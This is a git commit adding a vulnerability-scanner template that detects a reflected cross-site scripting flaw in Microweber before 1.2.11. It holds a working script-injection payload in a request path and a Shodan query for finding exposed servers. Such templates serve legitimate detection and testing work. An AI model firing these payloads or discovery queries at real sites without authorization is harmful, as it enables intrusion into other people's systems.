Create microweber-xss.yaml

Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>
patch-1
GwanYeong Kim 2022-02-28 16:17:51 +09:00
parent adc734a74f
commit 1368ea9fe7
1 changed files with 28 additions and 0 deletions

View File

@ -0,0 +1,28 @@
id: microweber-xss
info:
name: Microweber XSS
author: gy741
severity: medium
description: Cross-site Scripting (XSS) - Reflected in Packagist microweber/microweber prior to 1.2.11.
reference:
- https://github.com/microweber/microweber/issues/809
tags: microweber,xss
metadata:
shodan-query: 'http.favicon.hash:780351152'
requests:
- method: GET
path:
- '{{BaseURL}}/editor_tools/module?type=files/admin"><script>alert(1)</script>&params=filetype=images#path='
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- '<script>alert(1)</script>'